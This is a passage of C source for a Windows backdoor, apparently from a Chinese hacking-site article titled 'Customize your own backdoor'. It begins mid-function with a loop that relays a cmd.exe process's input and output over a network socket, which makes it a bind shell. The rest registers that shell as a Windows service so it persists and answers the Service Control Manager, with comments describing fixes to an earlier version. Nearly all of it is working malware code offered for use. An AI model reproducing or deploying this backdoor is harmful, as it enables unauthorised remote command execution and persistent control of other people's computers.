
定制自己的后门[推荐]

siinfo.hStdInput = hReadPipe2;

siinfo.hStdOutput = siinfo.hStdError = hWritePipe1;

CreateProcess(NULL,cmdLine,NULL,NULL,1,0,NULL,NULL,&siinfo,&ProcessInformation);

while(1)

{

Sleep(100);

ret=PeekNamedPipe(hReadPipe1,Buff,1024,&lBytesRead,0,0);

if(!lBytesRead)

{

lBytesRead = recv(s,Buff,1024,0);

if(lBytesRead <= 0) break;

ret = WriteFile(hWritePipe2,Buff,lBytesRead,&lBytesRead,0);

if(lBytesRead >= 4 && Buff[0]==\''e\'' && Buff[1]==\''x\'' && Buff[2]==\''i\'' && Buff[3]==\''t\'')

{

closesocket(s);

return 1;

}

if(!ret) break;

}

else

{

ret = ReadFile(hReadPipe1,Buff,lBytesRead,&lBytesRead,0);

if(!ret) break;

ret = send(s,Buff,lBytesRead,0);

if(ret <= 0) break;

}

}

}

closesocket(s);

WSACleanup();

return 1;

}

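/*
 * terminate - final cleanup for the service process.
 *
 * Releases the stop event and the worker-thread handle and, if the
 * service managed to register with the SCM, reports SERVICE_STOPPED
 * with @error as the Win32 exit code. ServiceMain calls this from
 * every failure path and once on a clean stop.
 *
 * Fix vs. the original: each global handle is reset to NULL after
 * CloseHandle so the stale value cannot be closed or used again
 * (Handler still reads hThread for Suspend/ResumeThread).
 *
 * error: Win32 error code to report to the SCM (0 on a clean stop).
 */
VOID terminate(DWORD error)
{
    if (hTerminateEvent) {
        CloseHandle(hTerminateEvent);
        hTerminateEvent = NULL;
    }

    /* hServiceStatus is non-zero only once RegisterServiceCtrlHandler
     * succeeded; a failure before that point reports nothing. */
    if (hServiceStatus)
        SendStatusToSCM(SERVICE_STOPPED, error, 0, 0, 0);

    /* CloseHandle only drops this reference; it does not end the
     * worker thread started by InitService. */
    if (hThread) {
        CloseHandle(hThread);
        hThread = NULL;
    }
}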

/*
 * ServiceMain - entry point invoked by the service control dispatcher.
 *
 * Registers the control handler, walks the SCM through three
 * SERVICE_START_PENDING checkpoints, creates the manual-reset event
 * that Handler signals on SERVICE_CONTROL_STOP, starts the worker
 * thread through InitService, reports SERVICE_RUNNING and then blocks
 * until the stop event is set. Every failure reports GetLastError()
 * through terminate() and returns. argc/argv are not used.
 */
VOID ServiceMain(DWORD argc, LPTSTR *argv)
{
    hServiceStatus = RegisterServiceCtrlHandler(ServicesName,
                                                (LPHANDLER_FUNCTION)Handler);
    if (!hServiceStatus)
        goto fail;

    /* Checkpoint 1: handler registered. */
    if (!SendStatusToSCM(SERVICE_START_PENDING, NO_ERROR, 0, 1, 5000))
        goto fail;

    /* Manual-reset, initially unsignalled; Handler sets it on STOP. */
    hTerminateEvent = CreateEvent(0, TRUE, FALSE, 0);
    if (!hTerminateEvent)
        goto fail;

    /* Checkpoints 2 and 3 precede the worker-thread start. */
    if (!SendStatusToSCM(SERVICE_START_PENDING, NO_ERROR, 0, 2, 1000))
        goto fail;
    if (!SendStatusToSCM(SERVICE_START_PENDING, NO_ERROR, 0, 3, 5000))
        goto fail;

    /* Starts the BindCmd2Port worker thread. */
    if (!InitService())
        goto fail;

    if (!SendStatusToSCM(SERVICE_RUNNING, NO_ERROR, 0, 0, 0))
        goto fail;

    /* Parked here for the service's lifetime. */
    WaitForSingleObject(hTerminateEvent, INFINITE);
    terminate(0);
    return;

fail:
    /* GetLastError() is read immediately after the failing call, as
     * in the original per-step handling. */
    terminate(GetLastError());
}

/*
 * SendStatusToSCM - report the service's state to the Service Control
 * Manager via the handle obtained in ServiceMain.
 *
 * While the service is SERVICE_START_PENDING no controls are accepted;
 * in any other state STOP, PAUSE/CONTINUE and SHUTDOWN are advertised
 * (Handler implements STOP and PAUSE/CONTINUE; its SHUTDOWN case just
 * returns). A non-zero service-specific exit code is surfaced as
 * ERROR_SERVICE_SPECIFIC_ERROR in dwWin32ExitCode, as the SCM expects.
 *
 * Returns the BOOL result of SetServiceStatus.
 */
BOOL SendStatusToSCM(DWORD dwCurrentState,
                     DWORD dwWin32ExitCode,
                     DWORD dwServiceSpecificExitCode,
                     DWORD dwCheckPoint,
                     DWORD dwWaitHint)
{
    SERVICE_STATUS status;
    DWORD accepted = 0;

    if (dwCurrentState != SERVICE_START_PENDING)
        accepted = SERVICE_ACCEPT_STOP |
                   SERVICE_ACCEPT_PAUSE_CONTINUE |
                   SERVICE_ACCEPT_SHUTDOWN;

    status.dwServiceType = SERVICE_WIN32_OWN_PROCESS;
    status.dwCurrentState = dwCurrentState;
    status.dwControlsAccepted = accepted;
    status.dwWin32ExitCode = dwServiceSpecificExitCode
                                 ? ERROR_SERVICE_SPECIFIC_ERROR
                                 : dwWin32ExitCode;
    status.dwServiceSpecificExitCode = dwServiceSpecificExitCode;
    status.dwCheckPoint = dwCheckPoint;
    status.dwWaitHint = dwWaitHint;

    return SetServiceStatus(hServiceStatus, &status);
}

/*
 * InitService - start the service's worker thread.
 *
 * Creates a thread running BindCmd2Port (the pipe/socket proxy loop
 * at the top of this file), stores its handle in the global hThread
 * (later used by Handler for Suspend/ResumeThread and by terminate
 * for CloseHandle) and marks the service as running.
 *
 * Returns FALSE, leaving bRunningService untouched, if CreateThread
 * fails; TRUE otherwise.
 */
BOOL InitService(void)
{
    DWORD threadId;

    hThread = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)BindCmd2Port,
                           0, 0, &threadId);
    if (!hThread)
        return FALSE;

    bRunningService = TRUE;
    return TRUE;
}

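/*
 * Handler - service control callback registered by ServiceMain.
 *
 * STOP:        reports STOP_PENDING, clears bRunningService and signals
 *              hTerminateEvent so ServiceMain wakes and runs terminate();
 *              nothing further is reported here because terminate()
 *              sends SERVICE_STOPPED.
 * PAUSE:       reports PAUSE_PENDING and suspends the worker thread.
 * CONTINUE:    reports CONTINUE_PENDING and resumes it.
 * SHUTDOWN:    returns at once; no status is sent and the worker is
 *              left running.
 * INTERROGATE and unknown codes fall through to the final report.
 *
 * Fixes vs. the original: the never-read `success` local is removed,
 * and the closing report sends the state the service is really in
 * (SERVICE_PAUSED while paused, else SERVICE_RUNNING) instead of the
 * 0 the original sent on INTERROGATE, on unknown codes, and on a
 * PAUSE/CONTINUE whose precondition failed.
 *
 * controlCode: SERVICE_CONTROL_* value delivered by the SCM.
 */
VOID Handler(DWORD controlCode)
{
    switch (controlCode) {
    case SERVICE_CONTROL_STOP:
        SendStatusToSCM(SERVICE_STOP_PENDING, NO_ERROR, 0, 1, 5000);
        bRunningService = FALSE;
        /* Wakes the WaitForSingleObject in ServiceMain. */
        SetEvent(hTerminateEvent);
        return;

    case SERVICE_CONTROL_PAUSE:
        if (bRunningService && !bPauseService) {
            SendStatusToSCM(SERVICE_PAUSE_PENDING, NO_ERROR, 0, 1, 1000);
            bPauseService = TRUE;
            SuspendThread(hThread);
        }
        break;

    case SERVICE_CONTROL_CONTINUE:
        if (bRunningService && bPauseService) {
            SendStatusToSCM(SERVICE_CONTINUE_PENDING, NO_ERROR, 0, 1, 1000);
            bPauseService = FALSE;
            ResumeThread(hThread);
        }
        break;

    case SERVICE_CONTROL_SHUTDOWN:
        return;

    case SERVICE_CONTROL_INTERROGATE:
    default:
        break;
    }

    /* Derive the reported state from the pause flag rather than from a
     * local that was only set on the successful PAUSE/CONTINUE paths. */
    SendStatusToSCM(bPauseService ? SERVICE_PAUSED : SERVICE_RUNNING,
                    NO_ERROR, 0, 0, 0);
}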

http://hackbase.com/tech/2004-11-14/765819.html
